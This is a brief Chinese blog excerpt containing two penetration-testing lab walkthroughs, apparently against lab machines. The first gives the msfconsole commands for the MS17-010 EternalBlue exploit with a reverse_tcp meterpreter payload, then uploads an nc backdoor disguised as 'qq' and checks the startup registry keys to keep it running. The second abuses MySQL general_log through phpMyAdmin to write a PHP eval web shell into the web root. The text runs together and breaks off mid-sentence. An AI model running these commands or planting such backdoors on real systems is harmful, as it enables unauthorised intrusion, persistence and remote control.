zgwz123456的博客

实验环境靶 机：windows 7攻击机：kali漏洞利用：ms17-010msfconsoleuse exploit/windows/smb/ms17_010_eternalbuleset payload windows/x64/meterpreter/reverse_tcpset rhosts 192.168.21.134set lhost 192.168.21.130set lport 6666run拿到权限后上传我们的nc后门程序（我把它改名成了qq）查看启动项的键值项，

本次实战直接以phpMyAdmin里进行sql语句操作1.show variables like “general_log%”将general_log改成ON就可以进行mysql日志输出保存了将general_log_file改成能执行php的目录下，即网站目录下查看我们修改后的配置写入我们的一句话木马select "<?php @eval($_REQUEST['cmd']);?>在这里我们可以看到成功写入了用蚁剑连接接下来我们用msf进行提权，打开kali，这里